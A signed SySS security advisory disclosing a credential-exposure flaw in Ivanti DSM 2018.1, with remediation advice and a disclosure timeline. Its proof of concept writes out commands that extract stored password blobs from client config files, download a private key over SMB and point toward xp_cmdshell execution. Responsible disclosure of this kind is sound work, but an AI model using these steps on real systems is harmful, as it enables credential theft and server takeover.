-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2019-019 Product: Ivanti DSM Manufacturer: Ivanti Affected Version(s): 2018.1 Tested Version(s): 2018.1 Vulnerability Type: Insufficiently Protected Credentials (CWE-522) Use of Hard-coded Cryptographic Key (CWE-321) Violation of Secure Design Principles (CWE-657) Risk Level: High Solution Status: Open Manufacturer Notification: 2019-05-22 Solution Date: 2020-04-01 Public Disclosure: 2021-10-15 CVE Reference: None assigned Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Ivanti DSM (formerly HEAT and Frontrange DSM) is an enterprise software deployment solution. The manufacturer describes the product as follows (see [1]): "IVANTI Desktop & Server Management (IVANTI DSM) is a multi-platform unified endpoint management solution that automatically packages and deploys software and operating systems, patches vulnerabilities, discovers software and hardware assets, and efficiently manages Windows OS migrations, virtual environments, Citrix server farms, and more. The DSM suite contains all the tools necessary to manage and secure endpoints from a unified, intuitive console." In certain configurations, an unprivileged user of a managed client system or malware running in his context can gain access to sensitive cryptographic key material and thereby to credentials of used service accounts which allow for privilege escalation attacks. A similar security issue that affected previous software versions and another supported password format was found and reported by SySS several years ago ([2], [3]). This security advisory concerns newly introduced password formats for storing service credentials. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: If the same user account is configured for "Depot Access" and "Distribution Service", the credentials of these high-privilege accounts are exposed to an attacker or malware with access to the managed client system. The credentials of the "Depot Access" account are stored accessible for everybody in obfuscated form on each managed client system in the NiCfg*.ncp configuration files. Password information stored in the k4 password format within those configuration files can be decoded as cleartext without further information. The "Distribution Service" account, by default, not only grants write access to the depot share, but also read access to the sensitive key material stored at "config/key/private.key". This file contains the key material used in the k6 password format. By knowing the used k6 algorithm and by having access to the cryptographic key, an attacker can decrypt the stored password information of the configuration files NiCfg*.ncp and thus gain unauthorized access to further service credentials, for instance, concerning the database server. In the default configuration, this would be an MSSQL 'sa' account, ultimately allowing command execution on the server system. Besides manual configuration, two installation modes yield this result, "Basic installation" which is documented as for testing only, but also the option "Use this account for all accounts except for the Runtime Service". ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): SySS GmbH developed a software tool for recovering password information of Ivanti DSM stored in different supported password formats like k4 and k6. The following example demonstrates the successful password recovery of a k4 password. $ strings NiCfgLcl.ncp | egrep -B1 '(^k4|\{)' rpcss/esiCore {EC2082A7-25F5-4E8C-AAA1-7316D1210E3E} - -- ivantiall k4uW1qpQj5ml6B4Q7+Y6R14CgVxd9NDkcUez3a5bcbcZtofYKc1pqyNE6nUWpbddYYdMTs7Q== The password can be recovered using a software tool developed in-house which implemented the corresponding decryption routine. > DSM --guid {EC2082A7-25F5-4E8C-AAA1-7316D1210E3E} k4[...] Decrypted: ivantiall This recovered password can then be used to connect to the depot share from which the private key used for storing k6 password information can be retrieved. Other manipulations, for example replacing executables on that share, are also possible. $ smbclient '//192.168.56.101/dsm$' -U ivantiall Enter ivantiall's password: *ivantiall* Domain=[DSMSERVER] OS=[Windows 10 Enterprise 17134] Server=[Windows 10 Enterprise 6.3] smb: \> cd config/key/ smb: \config\key\> ls . D 0 Fri Apr 26 14:24:28 2019 .. D 0 Fri Apr 26 14:24:28 2019 private.key A 1024 Fri Apr 26 14:24:28 2019 PrivilegedAccounts.txt A 87 Fri Apr 26 14:24:28 2019 Secured.txt A 0 Fri Apr 26 14:24:28 2019 30591054 blocks of size 4096. 24745515 blocks available smb: \config\key\> get private.key getting file \config\key\private.key of size 1024 as private.key [...] Now, the encrypted database credentials can be retrieved from the configuration files. $ strings NiCfgLcl.ncp | egrep -B1 '^k6' Provider=SQLOLEDB;Network Library=DBMSSOCN;Initial Catalog=DSMDB;\ Application Name=DSM;Data Source=DSMSERVER\DSM k6dzuhDzXpSOzxrdJWRQU++aF2LlSbIIyD7uLhc9M5lXdDC+fwBAcT+Bbt1pBwMY53tIB7/w== And again, using the developed software tool and having access to the used private key file, further stored k6 passwords can be decrypted, for instance, for the user account 'sa' of the MSSQL database. > DSM --keyfile private.key k6[...] Decrypted: mysqlpass For example, this password can then be used to connect to the Ivanti DSMdatabase and execute commands using 'xp_cmdshell'. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Use a distinct low-privilege account or machine accounts for depot access. Do not expose sensitive values to client systems unnecessarily. The Ivanti DSM Version 2020.1 installer more prominently warns about the dangers of shared account configurations. Also, a support article is available at [6] (for customers only) detailing secure service account setup. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2019-04-26: Vulnerability discovered 2019-05-22: Vulnerability reported to manufacturer 2020-04-01: Patch released by manufacturer 2021-10-15: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Ivanti DSM https://www.ivanti.de/products/desktop-and-server-management [2] SySS Security Advisory SYSS-2014-007 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2014-007.txt [3] Matthias Deeg, Privilege Escalation via Client Management Software, SySS GmbH, 2015 https://www.syss.de/fileadmin/dokumente/Publikationen/2015/Privilege_Escalation_via_Client_Management_Software.pdf [4] SySS Security Advisory SYSS-2019-019 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-019.txt [5] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ [6] Ivanti Support Article (Customer account required) https://forums.ivanti.com/s/article/DSM-Services-User-Accounts-Overview-Security-best-practices ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmFj5GMACgkQdo7+K7Pl PdoUigf/TozzLjJCtK7d6cHs4r8ifytbXH0WOLEAAEJf5a0gRBzh0bbm92rjxSZb QO/4pozr+hc/05ip3X0vuI/HgDzXyT37Xs7RlVM7q1QhU9U0iOfaOZ/LYw3vlCjN Tuq54ufWzvIvwepY40OYftObriuOzTJDu7GgQ9NM3tTaPO1By4iJm4iyr37/YsHs YK3PFMj5wfOMXuoCanXcqW8RLzwcNe6rNi7EdWTpeYZ866q4Co+N5dkNm26JG4r8 4J6s+ZvgiVuEqLVWPHUQET1jPrzO3TcQ1bnLspT8wh6vi5c1kHAJcLCh+kVQ/1Ol xlyQzSQ9cXpX7o9y1dP4DolsYmPBvA== =Lc/h -----END PGP SIGNATURE-----